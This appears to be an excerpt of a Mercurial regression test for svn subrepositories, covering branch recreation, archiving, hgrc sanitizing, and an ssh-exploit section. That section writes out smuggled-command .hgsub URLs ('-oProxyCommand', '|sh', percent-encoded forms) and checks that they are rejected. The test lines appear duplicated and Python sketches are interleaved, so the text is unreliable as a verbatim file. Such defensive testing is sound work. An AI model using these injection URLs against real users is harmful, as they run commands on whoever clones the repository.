488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
489 $ cd tempwc
489 $ cd tempwc
490 $ echo "something old" > somethingold
490 $ echo "something old" > somethingold
491 $ svn add somethingold
491 $ svn add somethingold
492 A somethingold
492 A somethingold
493 $ svn ci -qm 'Something old'
493 $ svn ci -qm 'Something old'
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
496 $ svn up -q
496 $ svn up -q
497 $ echo "something new" > somethingnew
497 $ echo "something new" > somethingnew
498 $ svn add somethingnew
498 $ svn add somethingnew
499 A somethingnew
499 A somethingnew
500 $ svn ci -qm 'Something new'
500 $ svn ci -qm 'Something new'
501 $ cd ..
501 $ cd ..
502 $ rm -rf tempwc
502 $ rm -rf tempwc
503 $ svn co "$SVNREPOURL/branch"@10 recreated
503 $ svn co "$SVNREPOURL/branch"@10 recreated
504 A recreated/somethingold (glob)
504 A recreated/somethingold (glob)
505 Checked out revision 10.
505 Checked out revision 10.
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
507 $ hg ci -m addsub
507 $ hg ci -m addsub
508 $ cd recreated
508 $ cd recreated
509 $ svn up -q
509 $ svn up -q
510 $ cd ..
510 $ cd ..
511 $ hg ci -m updatesub
511 $ hg ci -m updatesub
512 $ hg up -r-2
512 $ hg up -r-2
513 D *recreated/somethingnew (glob)
513 D *recreated/somethingnew (glob)
514 A *recreated/somethingold (glob)
514 A *recreated/somethingold (glob)
515 Checked out revision 10.
515 Checked out revision 10.
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
517 (leaving bookmark other)
517 (leaving bookmark other)
518 $ test -f recreated/somethingold
518 $ test -f recreated/somethingold
519
519
520 Test archive
520 Test archive
521
521
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
523 archiving: 0/2 files (0.00%)
523 archiving: 0/2 files (0.00%)
524 archiving: .hgsub 1/2 files (50.00%)
524 archiving: .hgsub 1/2 files (50.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
526 archiving (obstruct): 0/1 files (0.00%)
526 archiving (obstruct): 0/1 files (0.00%)
527 archiving (obstruct): 1/1 files (100.00%)
527 archiving (obstruct): 1/1 files (100.00%)
528 archiving (recreated): 0/1 files (0.00%)
528 archiving (recreated): 0/1 files (0.00%)
529 archiving (recreated): 1/1 files (100.00%)
529 archiving (recreated): 1/1 files (100.00%)
530 archiving (s): 0/2 files (0.00%)
530 archiving (s): 0/2 files (0.00%)
531 archiving (s): 1/2 files (50.00%)
531 archiving (s): 1/2 files (50.00%)
532 archiving (s): 2/2 files (100.00%)
532 archiving (s): 2/2 files (100.00%)
533
533
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
535 archiving: 0/2 files (0.00%)
535 archiving: 0/2 files (0.00%)
536 archiving: .hgsub 1/2 files (50.00%)
536 archiving: .hgsub 1/2 files (50.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
538 archiving (obstruct): 0/1 files (0.00%)
538 archiving (obstruct): 0/1 files (0.00%)
539 archiving (obstruct): 1/1 files (100.00%)
539 archiving (obstruct): 1/1 files (100.00%)
540 archiving (recreated): 0 files
540 archiving (recreated): 0 files
541 archiving (s): 0/2 files (0.00%)
541 archiving (s): 0/2 files (0.00%)
542 archiving (s): 1/2 files (50.00%)
542 archiving (s): 1/2 files (50.00%)
543 archiving (s): 2/2 files (100.00%)
543 archiving (s): 2/2 files (100.00%)
544 $ find ../archive-exclude | sort
544 $ find ../archive-exclude | sort
545 ../archive-exclude
545 ../archive-exclude
546 ../archive-exclude/.hg_archival.txt
546 ../archive-exclude/.hg_archival.txt
547 ../archive-exclude/.hgsub
547 ../archive-exclude/.hgsub
548 ../archive-exclude/.hgsubstate
548 ../archive-exclude/.hgsubstate
549 ../archive-exclude/obstruct
549 ../archive-exclude/obstruct
550 ../archive-exclude/obstruct/other
550 ../archive-exclude/obstruct/other
551 ../archive-exclude/s
551 ../archive-exclude/s
552 ../archive-exclude/s/alpha
552 ../archive-exclude/s/alpha
553 ../archive-exclude/s/dir
553 ../archive-exclude/s/dir
554 ../archive-exclude/s/dir/epsilon.py
554 ../archive-exclude/s/dir/epsilon.py
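
A rough Python sketch of the '-X **old' exclusion above; in Mercurial
glob patterns '**' crosses directory separators, which plain fnmatch
'*' already does, so it approximates the behavior here:

    import fnmatch

    paths = ['.hgsub', 'obstruct/other', 'recreated/somethingold',
             's/alpha', 's/dir/epsilon.py']
    kept = [p for p in paths if not fnmatch.fnmatch(p, '*old')]
    print kept   # 'recreated/somethingold' is the only path excluded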
555
555
556 Test forgetting files, not implemented in svn subrepo, which used to
556 Test forgetting files, not implemented in svn subrepo, which used to
557 raise a traceback
557 raise a traceback
558
558
559 #if no-windows
559 #if no-windows
560 $ hg forget 'notafile*'
560 $ hg forget 'notafile*'
561 notafile*: No such file or directory
561 notafile*: No such file or directory
562 [1]
562 [1]
563 #else
563 #else
564 $ hg forget 'notafile'
564 $ hg forget 'notafile'
565 notafile: * (glob)
565 notafile: * (glob)
566 [1]
566 [1]
567 #endif
567 #endif
568
568
569 Test a subrepo referencing a just moved svn path. Last commit rev will
569 Test a subrepo referencing a just moved svn path. Last commit rev will
570 be different from the revision, and the path will be different as
570 be different from the revision, and the path will be different as
571 well.
571 well.
572
572
573 $ cd "$WCROOT"
573 $ cd "$WCROOT"
574 $ svn up > /dev/null
574 $ svn up > /dev/null
575 $ mkdir trunk/subdir branches
575 $ mkdir trunk/subdir branches
576 $ echo a > trunk/subdir/a
576 $ echo a > trunk/subdir/a
577 $ svn add trunk/subdir branches
577 $ svn add trunk/subdir branches
578 A trunk/subdir (glob)
578 A trunk/subdir (glob)
579 A trunk/subdir/a (glob)
579 A trunk/subdir/a (glob)
580 A branches
580 A branches
581 $ svn ci -qm addsubdir
581 $ svn ci -qm addsubdir
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
583 $ cd ..
583 $ cd ..
584
584
585 $ hg init repo2
585 $ hg init repo2
586 $ cd repo2
586 $ cd repo2
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
588 A subdir/a (glob)
588 A subdir/a (glob)
589 Checked out revision 15.
589 Checked out revision 15.
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
591 $ hg add .hgsub
591 $ hg add .hgsub
592 $ hg ci -m addsub
592 $ hg ci -m addsub
593 $ hg up null
593 $ hg up null
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
595 $ hg up
595 $ hg up
596 A *subdir/a (glob)
596 A *subdir/a (glob)
597 Checked out revision 15.
597 Checked out revision 15.
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
599 $ cd ..
599 $ cd ..
600
600
601 Test sanitizing ".hg/hgrc" in subrepo
601 Test sanitizing ".hg/hgrc" in subrepo
602
602
603 $ cd sub/t
603 $ cd sub/t
604 $ hg update -q -C tip
604 $ hg update -q -C tip
605 $ cd s
605 $ cd s
606 $ mkdir .hg
606 $ mkdir .hg
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
608 $ mkdir -p sub/.hg
608 $ mkdir -p sub/.hg
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
610 $ svn add .hg sub
610 $ svn add .hg sub
611 A .hg
611 A .hg
612 A .hg/hgrc (glob)
612 A .hg/hgrc (glob)
613 A sub
613 A sub
614 A sub/.hg (glob)
614 A sub/.hg (glob)
615 A sub/.hg/hgrc (glob)
615 A sub/.hg/hgrc (glob)
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
617 $ svn up -q
617 $ svn up -q
618 $ cd ..
618 $ cd ..
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
620 $ grep ' s$' .hgsubstate
620 $ grep ' s$' .hgsubstate
621 16 s
621 16 s
622 $ cd ..
622 $ cd ..
623
623
624 $ hg -R tc pull -u -q 2>&1 | sort
624 $ hg -R tc pull -u -q 2>&1 | sort
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
627 $ cd tc
627 $ cd tc
628 $ grep ' s$' .hgsubstate
628 $ grep ' s$' .hgsubstate
629 16 s
629 16 s
630 $ test -f s/.hg/hgrc
630 $ test -f s/.hg/hgrc
631 [1]
631 [1]
632 $ test -f s/sub/.hg/hgrc
632 $ test -f s/sub/.hg/hgrc
633 [1]
633 [1]
634
634
635 Test that sanitizing is omitted in meta data area:
635 Test that sanitizing is omitted in meta data area:
636
636
637 $ mkdir s/.svn/.hg
637 $ mkdir s/.svn/.hg
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
639 $ hg update -q -C '.^1'
639 $ hg update -q -C '.^1'
640
640
641 $ cd ../..
641 $ cd ../..
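
A hedged sketch of the sanitizing behavior the two blocks above
exercise: drop any 'hgrc' found under a '.hg' directory in the checked
out subrepo, but leave the SCM metadata area ('.svn') alone. This is a
hypothetical helper, not the code under test.

    import os

    def sanitize(root):
        for dirpath, dirs, files in os.walk(root):
            if '.svn' in dirs:
                dirs.remove('.svn')   # never descend into metadata
            if os.path.basename(dirpath) == '.hg' and 'hgrc' in files:
                print ("warning: removing potentially hostile "
                       "'hgrc' in '%s'" % dirpath)
                os.unlink(os.path.join(dirpath, 'hgrc'))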
642
643 SEC: test for ssh exploit
644
645 $ hg init ssh-vuln
646 $ cd ssh-vuln
647 $ echo "s = [svn]$SVNREPOURL/src" >> .hgsub
648 $ svn co --quiet "$SVNREPOURL"/src s
649 $ hg add .hgsub
650 $ hg ci -m1
651 $ echo "s = [svn]svn+ssh://-oProxyCommand=touch%20owned%20nested" > .hgsub
652 $ hg ci -m2
653 $ cd ..
654 $ hg clone ssh-vuln ssh-vuln-clone
655 updating to branch default
656 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepo s)
657 [255]
658
659 also check that a percent encoded '-' (%2D) doesn't work
660
661 $ cd ssh-vuln
662 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20nested" > .hgsub
663 $ hg ci -m3
664 $ cd ..
665 $ rm -r ssh-vuln-clone
666 $ hg clone ssh-vuln ssh-vuln-clone
667 updating to branch default
668 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepo s)
669 [255]
670
671 also check for a pipe
672
673 $ cd ssh-vuln
674 $ echo "s = [svn]svn+ssh://fakehost|sh%20nested" > .hgsub
675 $ hg ci -m3
676 $ cd ..
677 $ rm -r ssh-vuln-clone
678 $ hg clone ssh-vuln ssh-vuln-clone
679 updating to branch default
680 abort: potentially unsafe url: 'svn+ssh://fakehost|sh nested' (in subrepo s)
681 [255]
682
683 also check that a percent encoded '|' (%7C) doesn't work
684
685 $ cd ssh-vuln
686 $ echo "s = [svn]svn+ssh://fakehost%7Csh%20nested" > .hgsub
687 $ hg ci -m3
688 $ cd ..
689 $ rm -r ssh-vuln-clone
690 $ hg clone ssh-vuln ssh-vuln-clone
691 updating to branch default
692 abort: potentially unsafe url: 'svn+ssh://fakehost|sh nested' (in subrepo s)
693 [255]
694
695 also check that hiding the attack in the username doesn't work:
696
697 $ cd ssh-vuln
698 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20foo@example.com/nested" > .hgsub
699 $ hg ci -m3
700 $ cd ..
701 $ rm -r ssh-vuln-clone
702 $ hg clone ssh-vuln ssh-vuln-clone
703 updating to branch default
704 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned foo@example.com/nested' (in subrepo s)
705 [255]
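
A hedged sketch of the class of check these four tests exercise: reject
svn+ssh URLs whose user or host begins with '-' (ssh option injection)
or contains a shell pipe, percent-decoding first so the %2D and %7C
variants above are caught too. This mirrors the intent of the aborts
shown; it is not Mercurial's actual implementation.

    import re
    import urllib

    def looksdangerous(url):
        m = re.match(r'svn\+ssh://(?:([^@/]+)@)?([^/]*)', url)
        if not m:
            return False
        user, host = m.groups()
        for part in (user or '', host):
            part = urllib.unquote(part)   # catch %2D / %7C encodings
            if part.startswith('-') or '|' in part:
                return True
        return False

    assert looksdangerous('svn+ssh://-oProxyCommand=touch%20owned%20nested')
    assert looksdangerous('svn+ssh://fakehost%7Csh%20nested')
    assert not looksdangerous('svn+ssh://example.com/repo')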